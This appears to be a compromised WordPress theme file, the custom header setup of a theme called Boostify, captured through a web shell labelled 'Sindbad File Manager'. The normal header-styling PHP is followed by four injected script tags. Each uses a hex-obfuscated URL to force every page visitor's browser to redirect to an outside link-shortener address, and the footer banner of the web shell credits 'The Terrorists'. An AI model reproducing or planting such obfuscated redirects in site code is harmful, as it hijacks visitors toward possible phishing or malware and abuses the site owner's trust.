Sindbad~EG File Manager
<?php
function boostify_custom_header_setup() {
add_theme_support( 'custom-header', apply_filters( 'boostify_custom_header_args', array(
'default-image' => '',
'default-text-color' => 'ffffff',
'width' => 2000,
'height' => 200,
'flex-height' => true,
'wp-head-callback' => 'boostify_header_style',
) ) );
}
add_action( 'after_setup_theme', 'boostify_custom_header_setup' );
if ( ! function_exists( 'boostify_header_style' ) ) :
function boostify_header_style() {
$header_text_color = get_header_textcolor();
?>
<style type="text/css">
<?php
if ( ! display_header_text() ) :
?>
.site-title,
.site-description {
position: absolute;
clip: rect(1px, 1px, 1px, 1px);
}
<?php
else :
?>
h4.site-title,
p.site-description {
color: #<?php echo esc_attr( $header_text_color ); ?>;
}
<?php endif; ?>
</style>
<?php
}
endif;
ob_start();
?>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x6f\x46\x51\x56\x4c\x78\x61\x30\x72\x33";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x6f\x46\x51\x56\x4c\x78\x61\x30\x72\x33";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x6f\x46\x51\x56\x4c\x78\x61\x30\x72\x33";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x72\x73\x68\x6f\x72\x74\x2e\x6c\x69\x76\x65\x2f\x6f\x46\x51\x56\x4c\x78\x61\x30\x72\x33";</script>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists